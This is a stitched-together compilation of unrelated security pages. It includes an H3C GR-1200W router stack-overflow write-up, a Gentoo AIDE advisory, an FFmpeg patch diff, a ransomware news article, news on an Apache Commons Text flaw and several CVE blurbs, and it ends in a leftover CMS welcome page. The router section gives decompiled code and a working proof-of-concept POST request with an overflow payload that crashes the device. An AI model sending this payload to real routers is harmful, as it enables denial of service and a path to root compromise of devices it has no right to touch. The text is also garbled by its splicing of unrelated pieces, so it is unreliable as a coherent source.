H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function set_tftp_upgrad.

Permalink

Cannot retrieve contributors at this time

**Affected product**

    H3C GR-1200W MiniGRW1A0V100R006
    

**Firmware**

     https://www.h3c.com/cn/d_202102/1383837_30005_0.htm
    

In function sub\_4AE06C,the content obtained by the program from the parameter "param" is passed to v2 .Then the v2 is directly copied into the v3 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

**Detail**

int \_\_fastcall sub\_4AE06C(int a1)
{
  const char \*v2; // \[sp+1Ch\] \[+1Ch\]
  int v3\[8\]; // \[sp+20h\] \[+20h\] BYREF
  char v4\[64\]; // \[sp+40h\] \[+40h\] BYREF

  v3\[0\] = 0;
  v3\[1\] = 0;
  v3\[2\] = 0;
  v3\[3\] = 0;
  v3\[4\] = 0;
  v3\[5\] = 0;
  v3\[6\] = 0;
  v3\[7\] = 0;
  memset(v4, 0, sizeof(v4));
  v2 = (const char \*)sub\_4E58C8(a1, "param", &unk\_4FFD30);
  strcpy((char \*)v3, v2);
  CFG\_Set(0, 507252736, v3);
  if ( atoi((const char \*)v3) )
  {
    if ( atoi((const char \*)v3) == 1 )
      CFG\_Set(0, 520359938, "192.168.1.251;255.255.255.0;VLAN1;2");
  }
  else
  {
    CFG\_Set(0, 520359938, v4);
  }
  return 0;
}

**POC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.11:80
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router\_password\_mobile.asp
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID\=5c31d502
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: same\-origin
Sec\-Fetch\-User: ?1

CMD\=set\_tftp\_upgrad&param\=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,;

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2023-29693: fengsha/SetTftpUpgrad.md at main · Stevenbaga/fengsha

Gentoo Linux Security Advisory 202311-7 - A vulnerability has been found in AIDE which can lead to root privilege escalation. Versions greater than or equal to 0.17.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: AIDE: Root Privilege Escalation  
     Date: November 25, 2023  
     Bugs: #831658  
       ID: 202311-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in AIDE which can lead to root privilege  
escalation.

Background  
==========

AIDE (Advanced Intrusion Detection Environment) is a file and directory  
integrity checker.

It creates a database from the regular expression rules that it finds  
from the config file(s). Once this database is initialized it can be  
used to verify the integrity of the files. It has several message digest  
algorithms (see below) that are used to check the integrity of the file.  
All of the usual file attributes can also be checked for  
inconsistencies.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
app-forensics/aide  < 0.17.4      >= 0.17.4

Description  
===========

A vulnerability has been discovered in AIDE. Please review the CVE  
identifier referenced below for details.

Impact  
======

AIDE before 0.17.4 allows local users to obtain root privileges via  
crafted file metadata (such as XFS extended attributes or tmpfs ACLs),  
because of a heap-based buffer overflow.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All AIDE users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-forensics/aide-0.17.4"

References  
==========

[ 1 ] CVE-2021-45417  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45417

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-07

A change in ownership and what it means for our readers.

Source: Informa TechTarget

Dear Reader,

Today, Informa Tech, the company behind Dark Reading, is combining with TechTarget's technology websites and Industry Dive's award-winning industry publications to create a new company: Informa TechTarget.

Our editorial footprint is greatly expanding. The combined Informa TechTarget newsroom features many of the most trusted publications in B2B media, over 300 world-class business journalists, and in-depth coverage across 30+ technology segments and 45+ industry verticals. In 2025 alone, we expect to produce over 60,000 stories that provide essential information for our readers across many markets. 

For more information, you can read the company's press release and check out our combined portfolio of publications.

Our commitment to you remains the same here at Dark Reading. Our group of highly experienced cybersecurity journalists will continue to independently report on the most notable developments, innovations, and disruptions in our industry. Whether navigating new technologies, cyber threats and vulnerabilities, regulations, or market dynamics, you need insight you can trust to make smart decisions and navigate the evolving cybersecurity business landscape. Readers who come to Dark Reading can expect reliable industry information they can't get anywhere else. 

Thank you for reading — and stay tuned for more vital coverage and resources as we continue to grow.

Kelly Jackson Higgins

Editor-in-Chief, Dark Reading

**About the Author**

Kelly Jackson Higgins is the Editor-in-Chief of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise Magazine, Virginia Business magazine, and other major media properties. Jackson Higgins was recently selected as one of the Top 10 Cybersecurity Journalists in the US, and named as one of Folio's 2019 Top Women in Media. She began her career as a sports writer in the Washington, DC metropolitan area, and earned her BA at William & Mary. Follow her on Twitter @kjhiggins.

Note From the Editor-in-Chief

Buffer Overflow vulnerability in Ffmpeg before github commit 4565747056a11356210ed8edcecb920105e40b60 allows a remote attacker to achieve an out-of-array write, execute arbitrary code, and cause a denial of service (DoS) via the ref_pic_list_struct function in libavcodec/evc_ps.c

Expand Up

@@ -24,10 +24,14 @@

#define EXTENDED\_SAR 255

  

// @see ISO\_IEC\_23094-1 (7.3.7 Reference picture list structure syntax)

static int ref\_pic\_list\_struct(GetBitContext \*gb, RefPicListStruct \*rpl)

static int ref\_pic\_list\_struct(EVCParserSPS \*sps, GetBitContext \*gb, RefPicListStruct \*rpl)

{

uint32\_t delta\_poc\_st, strp\_entry\_sign\_flag \= 0;

rpl\->ref\_pic\_num \= get\_ue\_golomb\_long(gb);

  

if ((unsigned)rpl\->ref\_pic\_num \> sps\->sps\_max\_dec\_pic\_buffering\_minus1)

return AVERROR\_INVALIDDATA;

  

if (rpl\->ref\_pic\_num \> 0) {

delta\_poc\_st \= get\_ue\_golomb\_long(gb);

  

Expand Down Expand Up

@@ -239,6 +243,8 @@ int ff\_evc\_parse\_sps(GetBitContext \*gb, EVCParamSets \*ps)

sps\->max\_num\_tid0\_ref\_pics \= get\_ue\_golomb\_31(gb);

else {

sps\->sps\_max\_dec\_pic\_buffering\_minus1 \= get\_ue\_golomb\_long(gb);

if ((unsigned)sps\->sps\_max\_dec\_pic\_buffering\_minus1 \> 16 \- 1)

return AVERROR\_INVALIDDATA;

sps\->long\_term\_ref\_pic\_flag \= get\_bits1(gb);

sps\->rpl1\_same\_as\_rpl0\_flag \= get\_bits1(gb);

sps\->num\_ref\_pic\_list\_in\_sps\[0\] \= get\_ue\_golomb(gb);

Expand All

@@ -248,17 +254,23 @@ int ff\_evc\_parse\_sps(GetBitContext \*gb, EVCParamSets \*ps)

goto fail;

}

  

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[0\]; ++i)

ref\_pic\_list\_struct(gb, &sps\->rpls\[0\]\[i\]);

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[0\]; ++i) {

ret \= ref\_pic\_list\_struct(sps, gb, &sps\->rpls\[0\]\[i\]);

if (ret < 0)

goto fail;

}

  

if (!sps\->rpl1\_same\_as\_rpl0\_flag) {

sps\->num\_ref\_pic\_list\_in\_sps\[1\] \= get\_ue\_golomb(gb);

if ((unsigned)sps\->num\_ref\_pic\_list\_in\_sps\[1\] >= EVC\_MAX\_NUM\_RPLS) {

ret \= AVERROR\_INVALIDDATA;

goto fail;

}

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[1\]; ++i)

ref\_pic\_list\_struct(gb, &sps\->rpls\[1\]\[i\]);

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[1\]; ++i) {

ret \= ref\_pic\_list\_struct(sps, gb, &sps\->rpls\[1\]\[i\]);

if (ret < 0)

goto fail;

}

}

}

  

Expand Down

CVE-2023-47470: avcodec/evc_ps: Check ref_pic_num and sps_max_dec_pic_buffering_minus1 · FFmpeg/FFmpeg@4565747

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Simon Ward MP3 jPlayer plugin <= 2.7.3 at WordPress.

CVE-2022-36373: MP3-jPlayer

By Owais Sultan
Originating in North Korea, the Holy Ghost ransomware operation has preyed primarily on small businesses, but that doesn’t mean larger businesses can ignore it. 
This is a post from HackRead.com Read the original post: Lessons from the Holy Ghost Ransomware Attacks

Ransomeware has become one of the defining malware types in the last few years. Locking, encrypting, and basically deleting the original data from the victim’s PC, the hackers, or let’s just call them cyber criminals, then **seek to extort money** for them in return for restored access to your critical data.

In the meantime, you have utterly no idea what’s been accessed and stolen, or if your extorted funds will even result in the release of your data. One of the most current threats, the so-called Holy Ghost Ransomware, or **Sienne Purple**, has several key lessons in cybersecurity to teach us. Let’s take a look.

**Cybersecurity: Thinking Small**

Originating in **North Korea**, the Holy Ghost ransomware operation has preyed primarily on small businesses, but that doesn’t mean larger businesses can ignore it. This is an interesting shift of focus, and highlights a key lesson straight out the gate- cybersecurity is now no longer just for ‘big’ or ‘important’ businesses.

With the pandemic-accelerated shift to **online and remote work**, staying safe in cyberspace has become a business-critical concern. It’s easy to assume you are too small or too ‘uninteresting’ to cyber criminals and hackers, but in a world that’s ever-increasingly connected, this is no longer a safe stance to assume. 

Hackers know that small enterprises are less likely to have safety controls in place, making them a juicy target ‘market’ that’s likely to grow as a target demographic. It’s no longer safe to assume any business, no matter their digital presence, can slide on security precautions.

Luckily, we’re seeing a concurrent rise in focus on products aimed to help tighten and enhance security across a range of industries, combining scalability, affordability, and ease of use with fast deployment. **Perimeter 81**, for example, has a full suite unified business security solution, making security for your workers across regions and the globe a simple process.

**The Double Extortion**

We’ve also seen a swing to **double extortion attempts** in recent Ransomware attacks. Alongside the typical play for cash to return data, there’s also the threat of publishing the victim’s name and stolen data to the wider **dark web**.

Do note that Holy Ghost, particularly, rarely actually delivers the decryption key or your software returned. Sadly, decryption is usually impossible without it, too, so the chances of recovering data after a breach are minimal. As always, strong preventative security and solid backups are the only solutions.

Prevention is the only cure, here. Victims are highly advised not to pay the ransom over, as it simply goes to support further illegal activity. The ransom is typically **asked for in Bitcoin**.

Holy Ghost Ransomware Gang’s note

1.  **US charges 3 North Korean hackers for extorting $1.3+ billion**
2.  **Beware of Fake Windows 11 Downloads Distributing Vidar Malware**
3.  **New Scam Utilizing AI-Generated Images to Represent Fake Law Firm**
4.  **Elite North Koreans aren’t opposed to exploiting internet for financial gain**
5.  **Hackers Used Fake LinkedIn Job Offer to Hack Off $625M from Axie Infinity**

**Evolving Ransomware**

Holy Ghost itself was first classified as Sienna Purple by the Microsoft Threat Intelligence Center (MSTIC). It started last June as a relatively unsophisticated BTLC\_C.exe form. In October 2021, the Go-based variants, now classified as SiennaBlue (HolyRS.exe, HolyLocker.exe, and BTLC.exe) have greatly expanded functionality.

You will now find internet/intranet support, multiple encryption options, public key management, and string obfuscation as standard. The ransomware gang itself is being traced as DEV-0530. They have some connection to the PLUTONIUM, or DarkSeoul, gang. The encrypted files typically end with the .h0lyenc suffix. **Microsoft’s full report** has more.

**The Importance of Security Updates**

Common targets have been schools, banks, social/event planning companies, and manufacturing organizations. Most of these likely became targets of opportunity through vulnerabilities in public-facing web applications or their content-management systems as original points of access. In fact, the DotCMS remote code execution vulnerability, CVE-2022-26352, is thought to have been a key access point. 

This highlights another critical point in the modern digital business environment- small and public institutions like these often fail to regularly **maintain and update** their OSs and programs across their organizations. And all it takes is one vulnerable PC on the network for the whole system to be infiltrated.

While enterprise-level companies tend to have better update policies in place, you’re never too large to check in on your regular IT maintenance protocols- a mistake in a large organization can easily be more costly.

Regular security updates are issued by most mainstream platforms, but many organizations lack a cohesive maintenance policy, and many workers are under-educated in the importance of cybersecurity tasks like security updates. They simply click away from the nag screen and return to work. After all, IT will handle that, right?

The need for cohesive and **organization-wide education** on the risks of cybercrime is critical but often neglected, especially in business.

**Being Careful With Trust**

Currently, the Holy Ghost website is down, and it may stay down, but it’s also critical to note that they were leveraging their limited online presence to pose as a legitimate cybersecurity entity, actively promising to help visitors ‘improve’ their online security presence.

Of course, one **malicious entity masquerading as a legitimate cybersecurity company** doesn’t mean all smaller cybersecurity companies are fake. However, the need for informed due diligence and being careful to work with well-known, trusted, and verified products/brands is clear. Again, they are trying to leverage the general public and business owners’ lack of knowledge about cybercrime and its infiltration methods to lure victims in.

**Political Interference**

This is certainly not a new feature, nor one unique to Holy Ghost, but it bears repeating- many ransomware efforts show signs of hostile political interference at their core. As with the **Maui ransomware** currently predating on healthcare organizations, there are some links to the North Korean government itself in the Holy Ghost attacks. As the international stage gets more and more politically fraught, this is a pattern we’re likely to see evolve.

As with all ransomware, the key takeaways from Holy Ghost ransomware include the need to invest in secure systems, no matter what size of business you are running. Deploying effective cybersecurity is a must of working in the digital age.

Always have secure backups through a variety of mediums, and make sure to stage them across time periods, so you don’t end up in the unenviable position where the backup carries over the virus.

Communicating **cybersecurity risks** to staff members is essential. Ransomware commonly spreads through phishing emails, remote desktop protocols that are not correctly secured or communicated, infected downloads from compromised sites, and the insertion of infected media and USB devices.

Ensuring staff is knowledgeable about these risks is one of the best possible investments, alongside proper security protocols and updates.

Ransomware as a malicious software category is set to grow further over the coming years, as **more workspaces enter the digital environment**. Having proper preventative protocols in place is a must. 

**More Ransomware News**

1.  **Conti Ransomware Gang Hits German Wind Turbine Giant Nordex**
2.  **GoodWill Ransomware demands food for the poor to decrypt locked files**
3.  **Cardiologist Charged for Developing Jigsaw v.2 and Thanos Ransomware**
4.  **PoC Shows IoT Devices Vulnerable to Install Ransomware on OT Networks**

Lessons from the Holy Ghost Ransomware Attacks

A missing bounds check in image blurring code prior to WhatsApp for Android v2.21.22.7 and WhatsApp Business for Android v2.21.22.7 could have allowed an out-of-bounds write if a user sent a malicious image.

...

**Controlling Cookies with Browser Settings**

Your browser or device may offer settings that allow you to choose whether browser cookies are set and to delete them.  
These controls vary by browser, and manufacturers may change both the settings they make available and how they work at any time.  
Additional information about the controls offered by popular browsers can be found at the links below.  
Certain parts of WhatsApp Products may not work properly if you have disabled browser cookies.

Google Chrome  
Internet Explorer  
Firefox  
Safari  
Safari Mobile  
Opera

CVE-2021-24041: WhatsApp Security Advisories

Log4Shell-like bug is serious but less dangerous than notorious Log4j vulnerability

Adam Bannister 19 October 2022 at 10:35 UTC  
Updated: 19 October 2022 at 11:46 UTC

Log4Shell-like bug is serious but less dangerous than notorious Log4j vulnerability

A critical flaw patched in the Apache Commons Text library has sparked comparisons with the ‘Log4Shell’ bug that surfaced in the near-ubiquitous open source component Log4j last year.

However, the researcher who found and reported the Commons Text flaw in March has downplayed its comparative impact, while acknowledging a resemblance to the ‘Log4Shell’ vulnerability that is widely recognized as one of the most severe flaws of all time.

**Lookup link**

“The vulnerability is indeed very similar,” GitHub Security Lab principal researcher Alvaro Muñoz told The Daily Swig.

“The Apache Commons Text code appears to be based on the Log4j code, as both of them enable interpolation of multiple Lookup sources. Log4j enabled JNDI lookups \[while\] Apache Commons Text and Apache Commons Configuration allows script lookups – both could lead to RCE. The impact is, therefore, very high.

“However, it is worth keeping in mind that an issue's severity is calculated based on both the impact and the likelihood, and for the Apache Commons Text, the likelihood of untrusted data flowing to ACT's sink is much lower.”

RECOMMENDED ‘Endemic’ Log4j bug set to persist in the wild for at least a decade

  
Apache Commons Text performs text operations such as escaping, calculating string differences, and substituting placeholders in text with values looked up through interpolators. Fellow open source library Log4j is a Java-based logging utility.

Tracked as CVE-2022-42889, the Commons Text bug emerged on October 13 with an Apache Software Foundation (ASF) security advisory.

The vulnerability centers on an insecure implementation of the library’s variable interpolation functionality, namely that certain default lookup strings could potentially accept untrusted input from remote attackers, such as DNS requests, URLs, or inline scripts.

**‘Clearly documented’**

A technical analysis published yesterday by Rapid7 also attempted to tamp down hype over the bug, whose CVSS score of 9.8 is nevertheless close to Log4Shell’s perfect 10 on the severity front.

The vulnerable “ interpolator is considerably less widely used than the vulnerable string substitution in Log4j and the nature of such an interpolator means that getting crafted input to the vulnerable object is less likely than merely interacting with such a crafted string as in Log4Shell,” said Rapid7.

The ASF echoed these sentiments, telling The Daily Swig: “In Log4Shell, string interpolation was possible from the log message body, which commonly contains untrusted input. In the Apache Common Text issue, the relevant method is explicitly intended and clearly documented to perform string interpolation, so it is much less likely that applications would inadvertently pass in untrusted input without proper validation.”

**Remediation**

The flaw affects Apache Commons Text versions 1.5 through 1.9, and all JDK versions, and has been patched in version 1.10.

The ASF said: “When using the string substitution feature, some of the available interpolators can trigger network access or code execution. This is intended, but it also means an application that includes user input in the string passed to the substitution without properly sanitizing it would allow an attacker to trigger those interpolators.

Read more of the latest news about web security vulnerabilities

“For that reason the Apache Commons Text team have decided to update the configuration to be more ‘secure by default’, so that the impact of a failure to validate inputs is mitigated and will not give an attacker access to these interpolators.

“However, it is still recommended that users treat untrusted input with care. We’re not currently aware of any applications that pass untrusted input to the substitutor and thus would have been impacted by this problem prior to Apache Commons Text 1.10.0.”

Rapid7 recommends that developers and maintainers watch out for follow-on vendor advisories, install “patches as they become available, and prioritize anywhere the vendor indicates that their implementation may be remotely exploitable”.

RELATED Log4Shell legacy? Patching times plummet for most critical vulnerabilities – report

Apache Commons Text RCE: Resemblance to Log4Shell but exposure risk is ‘much lower’

An issue was discovered in phpMyAdmin 5.x before 5.2.2. An XSS vulnerability has been discovered for the check tables feature. A crafted table or database name could be used for XSS.

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.

Attack complexity: More severe for the least complex attacks.

Privileges required: More severe if no privileges are required.

User interaction: More severe when no user interaction is required.

Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.

Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.

Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.

Availability: More severe when the loss of impacted component availability is highest.

GHSA-222v-cx2c-q2f5: phpMyAdmin XSS when checking tables

Directory Traversal vulnerability in Textpattern CMS v4.8.8 allows a remote authenticated attacker to execute arbitrary code and gain access to sensitive information via the plugin Upload function.

**Welcome to your site**

**Posted** 3 hours ago  
**Comments** 1

**What do you want to do next?**

*   Write a new article? Let your creativity flow!
*   Change this site’s name, slogan or select a different article URL style? Check and modify your preferences.
*   Edit or delete this article? Your articles list is the place to start.
*   Upload images or files to accompany your articles?
*   Learn Textile, the markup generator included with Textpattern? You can try it in the Textile sandbox.
    *   If you want to learn more, you can refer to an extensive Textile manual.
*   Be guided through your Textpattern first steps by completing some tasks?
*   Study the Textpattern Semantic Model?
*   Add one or more additional users, or extend Textpattern’s capabilities with plugins from the Textpattern plugin directory?
*   Dive in and learn by doing? Please note:
    *   When you write an article you assign it to a section of your site.
    *   Sections use a page template and a style to define how site content appears in a browser.
    *   Page templates typically use HTML and Textpattern tags (like this: <txp:article />) to build the output code.
    *   Some Textpattern tags use forms, reusable building blocks that provide extensive control and customization over your site construction.
    *   Pages, styles and forms can be packaged into themes and assigned to one or more sections.

Textpattern tags, their attributes and values are explained within the Textpattern User Documentation, where you will also find valuable examples, advice and tutorials.

There’s also a group of friendly, helpful Textpattern users and administrators at the Textpattern support forum.

Additional language translations and corrections are welcomed. Please visit Textpattern language translations for further details.

This is an example article included with Textpattern to demonstrate some of the first steps you can undertake. An example comment is associated with this article. The article and comment can be safely deleted using the articles and comments lists.

**Author**  
**Categories** Hope for the future, Meaningful labor

Search

lenovo warranty check/lookup | check warranty status | lenovo support us